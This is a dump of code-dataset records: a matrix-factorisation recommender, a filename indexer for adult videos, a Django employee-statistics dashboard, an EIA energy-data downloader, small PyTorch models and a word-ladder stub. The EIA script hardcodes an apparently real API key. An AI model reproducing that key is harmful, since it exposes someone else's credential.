self.U[user_ids]\n ev = self.V[item_ids]\n\n dL_dU = -2 * residual * ev\n dL_dV = -2 * residual * eu\n\n # Regularization\n l2 = 0.1\n dl2eu_dU = l2 * 2 * eu\n dl2ev_dV = l2 * 2 * ev\n dl2bu_dbu = l2 * 2 * self.u[user_ids]\n dl2bv_dbv = l2 * 2 * self.v[item_ids]\n\n dL_dbu = dL_dbu + dl2bu_dbu\n res[\"dL_dbu\"] = dL_dbu\n dL_dbv = dL_dbv + dl2bv_dbv\n res[\"dL_dbv\"] = dL_dbv\n dL_dU = dL_dU + dl2eu_dU\n res[\"dL_dU\"] = dL_dU\n dL_dV = dL_dV + dl2ev_dV\n res[\"dL_dV\"] = dL_dV\n return res\n\n # Sum of the biases and dot product of the embeddings\n #广播的时候要用 axis=-1\n def predict(self, user_ids, item_ids):\n user_ids = user_ids.astype('int')\n item_ids = item_ids.astype('int')\n return sum([self.b,\n self.u[user_ids],\n self.v[item_ids],\n (self.U[user_ids]*self.V[item_ids]).sum(axis=-1)])#向量求和 axis=-1:在最后一维操作\n #在user_ids为多个数据时 U[user_ids]会变成3维,\n \"\"\"\n1 c = np.array([[0, 2, 1], [3, 5, 6], [0, 1, 1]])\n2 print c.sum()\n3 print c.sum(axis=0)\n4 print c.sum(axis=1)\n5 结果分别是:19, [3 8 8], [ 3 14 2]\n6 axis=0, 表示列。\n7 axis=1, 表示行。\n \"\"\"\n\n # Perform a gradient descent step\n def update_parameters(self, user, item, rating, learning_rate=0.005):\n user = user.astype('int')\n item = item.astype('int')\n gradients = self.compute_gradient(user, item, rating)\n self.b = self.b - learning_rate * gradients['dL_db']\n self.u[user] = self.u[user] - learning_rate * gradients['dL_dbu']\n self.v[item] = self.v[item] - learning_rate * gradients['dL_dbv']\n self.U[user] = self.U[user] - learning_rate * gradients['dL_dU']\n self.V[item] = self.V[item] - learning_rate * gradients['dL_dV']\n# Generate a random number\nmodel = Model(latent_factors_size=100)\nmodel.b = train_ratings[:, 2].mean()\n\nsgd_iteration_count = 0\nbest_validation_rmse = 9999\npatience = 0\nupdate_frequency = 10000\n#每次依次增加10000个数据进行训练,(有放回随机抽取)\ntrain_errors = []\nvalid_errors = []\ntest_errors = []\n\nbest_parameters = None\n\n# model size = 100\n# learning rate = 0.005\n# l2 = 0.1\n# Should take 6 minutes\ndef sample_random_training_index():\n return np.random.randint(0, len(train_ratings))\n\n# Compute root mean squared error between x and y\ndef compute_rmse(x, y):\n return ((x - y)**2).mean()**0.5\n\n# utilitary functions for getting the train/valid/test\ndef get_rmse(ratings):\n return compute_rmse(model.predict(ratings.T[0:1],ratings.T[1:2]), ratings.T[2])\n #*ratings.T[:2] 传入参数出入两列,一列为userId 第二列为 movieId 函数的广播机制标量和矩阵参数传入的区别测试中有案例\n #是利用训练数据进行训练(训练的时候一条一条数据对模型进行逐步优化,梯度下降),评估的时候利用所有训练集进行评估\n\ndef get_trainset_rmse():\n return get_rmse(train_ratings)\n\ndef get_validset_rmse():\n return get_rmse(valid_ratings)\n\ndef get_testset_rmse():\n return get_rmse(test_ratings)\n\n\nstart_time = time.time()\nbest_validation_rmse=1\nwhile True:\n try:\n if sgd_iteration_count % update_frequency == 0 and sgd_iteration_count>0:\n train_set_rmse = get_trainset_rmse()\n valid_set_rmse = get_validset_rmse()\n test_set_rmse = get_testset_rmse()\n\n train_errors.append(train_set_rmse)\n valid_errors.append(valid_set_rmse)\n test_errors.append(test_set_rmse)\n\n print( 'Iteration: ', sgd_iteration_count)\n print( 'Validation RMSE:', valid_set_rmse)\n if valid_set_rmse < best_validation_rmse:\n print( 'Test RMSE :', test_set_rmse)\n print('Best validation error up to now !')\n patience = 0\n best_validation_rmse = valid_set_rmse\n best_parameters = model.save_parameters()\n else:\n patience += 1\n if patience >= 20:\n print\n 'Exceed patience for optimization, stopping!'\n break\n print\n training_idx = sample_random_training_index()\n user, item, rating = train_ratings[training_idx]\n print('initial user and item sgd_iteration_count',user.shape, item.shape,sgd_iteration_count)\n model.update_parameters(user, item, rating)\n sgd_iteration_count += 1\n except KeyboardInterrupt:\n print( 'Stopped Optimization')\n print('Current valid set performance=%s' % compute_rmse(model.predict(*valid_ratings.T[:2]), valid_ratings[:, 2]))\n print('Current test set performance=%s' % compute_rmse(model.predict(*test_ratings.T[:2]), test_ratings[:, 2]))\n break\n\nmodel.load_parameters(best_parameters)\nstop_time = time.time()\n\nprint('Optimization time : ', (stop_time - start_time) / 60., 'minutes')\n\nx = update_frequency * np.arange(len(train_errors))\nfig = plt.figure(num=None, figsize=(10, 10), dpi=500)\nplt.plot(x, train_errors, 'r--', x, valid_errors, 'bs', x, test_errors, 'g^')\nplt.legend(['training error', 'validation error', 'testing error'])\nplt.show()\nprint(\"start test\")\ntest_predictions = model.predict(*test_ratings.T[:2])\ntest_df = pd.DataFrame({'userId': test_ratings[:, 0],\n 'movieId': test_ratings[:, 1],\n 'rating': test_ratings[:, 2],\n 'prediction': test_predictions})\ntest_df.head()\n#在测试集上的表现\nprint ('Root Mean Squared Error\\t\\t', ((test_df.rating - test_df.prediction)**2).mean()**0.5)\nprint ('Mean Absolute Error\\t\\t', (test_df.rating - test_df.prediction).abs().mean())\nprint ('Mean Absolute Percentile Error\\t', 100*((test_df.rating - test_df.prediction).abs() / test_df.rating).mean(), '%')\n\nplt.plot(*test_df.groupby('rating').prediction.mean().reset_index().values.T)\nplt.plot(np.arange(0, 6), np.arange(0, 6), '--')\nplt.xlim([0.5, 5])#x轴刻度\nplt.ylim([0.5, 5])#y轴刻度\nplt.xlabel('True Rating')#x轴的含义\nplt.ylabel('Mean Predicted Rating')\n# the model is a bit more conservative, this is normal\n\n#相似度计算\nmovies_embeddings = dict([(i, model.V[i]) for i in movies.index.values])\n#余弦相似度计算\ndef compute_cosine_similarity(movieId):\n movie_embedding = movies_embeddings[movieId]\n movie_embedding_norm = (movie_embedding**2).sum()**0.5\n similarity = dict([(movie, ((movie_embedding*emb).sum()) / (((emb**2).sum()**0.5) * movie_embedding_norm))\n for (movie, emb) in movies_embeddings.items()])\n return similarity\n#欧式距离相似度\ndef compute_euclidian_similarity(movieId):\n movie_embedding = movies_embeddings[movieId]\n similarity = dict([(movie, -((movie_embedding-emb)**2).sum()**0.5)\n for (movie, emb) in movies_embeddings.items()])\n return similarity\n\nmovies[movies.title.str.startswith('Catch Me')]\n# movieId = 5952 # lord of the rings\nmovieId = 79132 # inception\n# movieId = 1 # toy story\n\nsorted_movies = sorted(compute_cosine_similarity(movieId).items(), key = lambda x:x[1])\n# sorted_movies = sorted(compute_euclidian_similarity(movieId).items(), key = lambda x:x[1])\n\nprint ('Closest')\nfor i in range(1, 16):\n id, sim = sorted_movies[-i]\n print (i, movies.loc[id].title, '\\t', movies.loc[id].genres, sim)\n print\n\nprint ('Farthest')\nfor i in range(15,-1,-1):\n id, sim = sorted_movies[i]\n print( i, movies.loc[id].title)\n print( '\\t', movies.loc[id].genres, sim)\n print", "sub_path": "MatrixCf/MF.py", "file_name": "MF.py", "file_ext": "py", "file_size_in_byte": 15904, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 113, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 181, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 274, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 296, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 343, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 344, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 344, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 347, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 357, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 357, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 358, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 358, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 359, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 359, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 360, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 360, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 361, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 361, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 362, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 362, "usage_type": "name"}]} +{"seq_id": "601926029", "text": "from pathlib import Path\nimport os\nimport sqlite3\nimport re\n\ntree_str = ''\np = Path('Z:\\AVs')\n\nfileList = []\n\nclass MySqlite3:\n def __init__(self):\n self.dbFile = r'./jav.db'\n self.tableName = 'jav_file'\n\n self.dbConnect()\n\n self.cur.execute('''DROP TABLE IF EXISTS jav_file_t''')\n self.cur.execute('''CREATE TABLE IF NOT EXISTS jav_file_t(\n file_name VARCHAR(256) NOT NULL,\n film_index VARCHAR(256) NOT NULL,\n file_sub_index VARCHAR(256)\n )''')\n\n## connect to the database,create connect object and cursor object\n def dbConnect(self):\n self.conn = sqlite3.connect(self.dbFile)\n self.cur = self.conn.cursor()\n## disconnect\n def closeCnx(self):\n self.conn.close()\n\n def insertData(self, fileName, filmIndex, fileSubIndex):\n self.cur.execute(\"INSERT INTO jav_file_t VALUES (?, ?, ?)\", (fileName, filmIndex, fileSubIndex))\n self.conn.commit()\n\n def __del__(self):\n self.closeCnx()\n\ndef generate_tree(pathname, n=0):\n global tree_str\n if pathname.is_file():\n fileList.append(pathname)\n elif pathname.is_dir():\n for cp in pathname.iterdir():\n generate_tree(cp, n + 1)\n\nclass JavProcessor:\n def __init__(self):\n self.txtContent = []\n self.fileIndexList = []\n\n def inputFromFile(self, sourceFile):\n returnVal = []\n try:\n fileHandler = open(sourceFile, 'r',encoding='utf-8')\n except:\n print(\"Can NOT open file %s, please check!\", sourceFile)\n return -1\n while 1:\n line = fileHandler.readline()\n if not line:\n fileHandler.close()\n break\n returnVal.append(line)\n self.getJavIndex(line)\n self.txtContent = returnVal\n return 1\n\n def getJavIndex(self, fullPathFileName):\n fileName = re.search(\"([^<>/\\\\\\|:\"\"\\*\\?]+\\.\\w+$)\",fullPathFileName).group()\n if re.search(\"\\.(mp4|rmvb|flv|mpeg|avi|mov|wmv|rmvb)$\",fileName):\n #matchGrp = re.match(\".*[\\\\\\| |\\-|\\)|\\(|\\[|\\.]([\\w|-]{2,6})[-|_]?(\\d{2,})\", fileName)\n matchGrp = re.match(\"[ |\\-|\\)|\\(|\\[|\\.|\\]]*([\\w]{2,8})[-|_]((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[ ]([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\"[^|.*[^a-z|^A-Z|^0-9|]]*([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[^a-z|^A-Z|^0-9]*([a-z|A-Z]{2,6})((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n matchGrp = re.match(\".*[^a-z|^A-Z|^0-9]([a-z|A-Z]{2,6})-((\\d{2,})[a-e|A-E]?)\", fileName)\n if matchGrp is None:\n print(\"Error File Name: %s\",fileName)\n return\n print(\"5\")\n\n try:\n filmIndex = matchGrp.group(1)+\"-\"+matchGrp.group(3)\n fileIndex = matchGrp.group(1)+\"-\"+matchGrp.group(2)\n except:\n print(\"Error Can not Join \", matchGrp.group(1), matchGrp.group(3),fileName)\n return\n\n self.fileIndexList.append([fullPathFileName, filmIndex, fileIndex])\n\n def outputList(self):\n return self.fileIndexList\n\n def outputList2File(self):\n fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n for item in self.fileIndexList:\n # print(item[0],\",\",item[1])\n #for fileLine in fileList:\n fileHandler.write(item[0][:-1]+\",\"+item[1]+\"\\n\")\n fileHandler.close\n\n def outputListIndex(self):\n fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n for item in self.fileIndexList:\n # print(item[0],\",\",item[1])\n #for fileLine in fileList:\n fileHandler.write(item[0][:-1]+\",\"+item[1]+\"\\n\")\n fileHandler.close\n\n\n\nif __name__ == '__main__':\n #generate_tree(p)\n\n #fileHandler = open(\"output.txt\",\"w\",encoding='utf-8')\n #for fileLine in fileList:\n # fileHandler.write(str(fileLine)+\"\\n\")\n #fileHandler.close\n dbHandler = MySqlite3()\n jap = JavProcessor()\n jap.inputFromFile(\"JavFileList.txt\")\n javFileList = jap.outputList()\n jap.outputList2File()\n for item in javFileList:\n dbHandler.insertData(item[0],item[1],item[2])\n\n\n", "sub_path": "jav_file.py", "file_name": "jav_file.py", "file_ext": "py", "file_size_in_byte": 4558, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 27, "usage_type": "call"}, {"api_name": "re.search", "line_number": 71, "usage_type": "call"}, {"api_name": "re.search", "line_number": 72, "usage_type": "call"}, {"api_name": "re.match", "line_number": 74, "usage_type": "call"}, {"api_name": "re.match", "line_number": 76, "usage_type": "call"}, {"api_name": "re.match", "line_number": 78, "usage_type": "call"}, {"api_name": "re.match", "line_number": 80, "usage_type": "call"}, {"api_name": "re.match", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "241461317", "text": "# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import ListView\nfrom django.http import HttpResponseRedirect\nfrom employees.models import Employee, RACE_GROUPS\n\n\nclass DashboardView(ListView):\n \"\"\"\n As the name suggests , this view is responsible\n for rendering the apps dashboard.\n\n NOTE: I noticed when querying the API limiting doesn't\n work as expected so this logic assumes only one page of\n results is returned.\n \"\"\"\n\n template_name = 'dashboard.html'\n token = None\n user_name = None\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"\n The dispatch method is responsible for checking\n if the user is authenticated and setting up\n initial values.\n \"\"\"\n if 'token' not in request.session:\n return HttpResponseRedirect('/login/')\n self.token = request.session['token']\n self.user_name = request.session['user_name']\n return super(DashboardView, self).dispatch(request, *args, **kwargs)\n\n def get_queryset(self):\n \"\"\"\n This is being set to a blank list since we're not using django's\n default ORM models and therefore need to define a custom method\n to set context data.\n \"\"\"\n return []\n\n def get_context_data(self, **kwargs):\n \"\"\"\n Query the rest API and find the relevant stats we need\n to populate the dashboard.\n \"\"\"\n context = super(DashboardView, self).get_context_data(**kwargs)\n EmployeeAPI = Employee(token=self.token)\n\n context['user_name'] = self.user_name\n context['birthdays'] = EmployeeAPI.objects.filter(\n ordering=\"-birth_date\"\n )\n\n # position__sort doesn't seem to work too well\n context['positions'] = EmployeeAPI.objects.filter(ordering=\"-position\")\n\n # all employees\n # Generator will discard values after iterating through them so\n # listify this to preserve data for later usuage.\n context['employees'] = list(EmployeeAPI.objects.filter(\n ordering=\"-user__first_name\"\n )\n )\n\n # calculate race groups\n race_groups = {}\n for emp in context['employees']:\n race = RACE_GROUPS[emp.race]\n if race in race_groups.keys():\n race_groups[race] += 1\n else:\n race_groups[race] = 1\n\n # sort by lowest to highest\n context['race_groups'] = OrderedDict(\n sorted(race_groups.items(), key=lambda k: k[1])\n )\n\n # calculate genders\n genders = {'Male': 0, 'Female': 0}\n\n for emp in context['employees']:\n gender = 'Male' if emp.gender == 'M' else 'Female'\n genders[gender] += 1\n\n # sort by lowest to highest\n context['genders'] = OrderedDict(\n sorted(genders.items(), key=lambda k: k[1])\n )\n return context\n", "sub_path": "employees/views/dashboard.py", "file_name": "dashboard.py", "file_ext": "py", "file_size_in_byte": 2992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.views.generic.ListView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 30, "usage_type": "call"}, {"api_name": "employees.models.Employee", "line_number": 49, "usage_type": "call"}, {"api_name": "employees.models.RACE_GROUPS", "line_number": 70, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 89, "usage_type": "call"}]} +{"seq_id": "175986250", "text": "# Import needed modules\nimport csv\nimport math\nimport requests\n\n# Question: Compare the production of 3 different energy sources (renewable, nuclear, natrual gas) in kJs, by month, over the last 20 years\n\n# Define global EIA API key variable\nEIA_APIkey = \"a0758428314605c2172e496804668b98\"\n \n# Collect renewable data\ndef collectdata_renewable():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site\n url_renewable = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.REPRBUS.M\"\n \n # Insert EIA API key into url\n url_renewable = url_renewable.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_renewable = requests.get(url_renewable)\n \n # Convert from json into python\n renewable_0 = json_renewable.json()\n \n # Convert data into kJ from trillions of butanes (1055055852620 kJ per trillion butane)\n renewable_data = renewable_0['series'][0]['data']\n for a in renewable_data:\n a[1] = a[1]*1055055852620\n \n # Return data\n return renewable_data\n\n# Collect nuclear data\ndef collectdata_nuclear():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site.\n url_nuclear = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.NUETPUS.M\"\n \n # Insert EIA API key into url\n url_nuclear = url_nuclear.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_nuclear = requests.get(url_nuclear)\n \n # Convert from json into python\n nuclear_0 = json_nuclear.json()\n \n # Convert data from millions of kilowatt-hours into kJ (3600000000kJ per million of kilowatt-hours)\n nuclear_data = nuclear_0['series'][0]['data']\n for a in nuclear_data:\n a[1] = a[1]*3600000000\n \n # Return data\n return nuclear_data\n\n# Collect natural gas data\ndef collectdata_naturalgas():\n \n # Define api basics\n # Note: url, with various ids and series, found on eia site\n url_naturalgas = \"http://api.eia.gov/series/?api_key=YOUR_API_KEY_HERE&series_id=TOTAL.NGELPUS.M\"\n \n # Insert EIA API key into url\n url_naturalgas = url_naturalgas.replace(\"YOUR_API_KEY_HERE\", EIA_APIkey)\n \n # Send data requests and store in a variable\n json_naturalgas = requests.get(url_naturalgas)\n \n # Convert from json into python\n naturalgas_0 = json_naturalgas.json()\n \n # Convert data from billions of cubic feet of natural gas to kJ (1055055852620kJ per billion ft^3 of natural gas)\n naturalgas_data = naturalgas_0['series'][0]['data']\n for a in naturalgas_data:\n a[1] = a[1]*1055055852620\n \n # Return data\n return naturalgas_data\n\n# Store data in csv files \ndef storedata(data1, data2, data3, type1, type2, type3, csvtitle):\n \n # Make csv files\n csvfile = open(csvtitle, \"w\")\n \n # Create csvwriter\n csvwriter = csv.writer(csvfile, delimiter = \",\")\n \n # Put data into csv files\n csvwriter.writerow(['Year', 'Year/Month', type1 + ' (kJ)', type2 + ' (kJ)', type3 + ' (kJ)'])\n for a in data1:\n csvwriter.writerow([str(a[0][0:4]), str(a[0][0:4]) + \"-\" + str(a[0][4:6]), str(a[1]), str(data2[data1.index(a)][1]), str(data3[data1.index(a)][1])])\n\n# Call all functions\nstoredata(collectdata_renewable(), collectdata_nuclear(), collectdata_naturalgas(), 'Renewable Energy', 'Nuclear Energy', 'Natural Gas Energy', 'energydata.csv')", "sub_path": "csvdata.py", "file_name": "csvdata.py", "file_ext": "py", "file_size_in_byte": 3481, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "237153196", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef conv_block(in_channels, out_channels, kernel_size=3, stride=1,\n padding=1):\n return nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding,\n bias=False),\n nn.BatchNorm2d(out_channels, affine=False),\n nn.ReLU(inplace=True)\n )\n\nclass ConvNet(nn.Module):\n def __init__(self):\n super(ConvNet, self).__init__()\n self.model = nn.Sequential(\n conv_block(3, 32),\n conv_block(32, 32),\n conv_block(32, 64, stride=2),\n conv_block(64, 64),\n conv_block(64, 64),\n conv_block(64, 128, stride=2),\n conv_block(128, 128),\n conv_block(128, 256),\n conv_block(256, 256),\n nn.AdaptiveAvgPool2d(1)\n )\n\n self.classifier = nn.Linear(256, 10, bias=False)\n\n def forward(self, x):\n h = self.model(x)\n B, C, _, _ = h.shape\n h = h.view(B, C)\n return self.classifier(h)\n\n\nclass CifarNet(nn.Module):\n '''\n From https://github.com/pytorch/tutorials/blob/master/beginner_source/blitz/cifar10_tutorial.py\n '''\n def __init__(self):\n super(CifarNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 16 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n", "sub_path": "quant_fl/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 1785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Sequential", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "437109279", "text": "#!/bin/python3\n\n\ndef word_ladder(start_word, end_word, dictionary_file='words5.dict'):\n '''\n Returns a list satisfying the following properties:\n 1. the first element is `start_word`\n 2. the last element is `end_word`\n 3. elements at index i and i+1 are `_adjacent`\n 4. all elements are entries in the `dictionary_file` file\n For example, running the command\n ```\n word_ladder('stone','money')\n ```\n may give the output\n ```\n ['stone', 'shone', 'phone', 'phony', 'peony', 'penny', 'benny', 'bonny', 'boney', 'money']\n ```\n but the possible outputs are not unique,\n so you may also get the output\n ```\n ['stone', 'shone', 'shote', 'shots', 'soots', 'hoots', 'hooty', 'hooey', 'honey', 'money']\n ```\n (We cannot use doctests here because the outputs are not unique.)\n Whenever it is impossible to generate a word ladder between the two words,\n the function returns `None`.\n 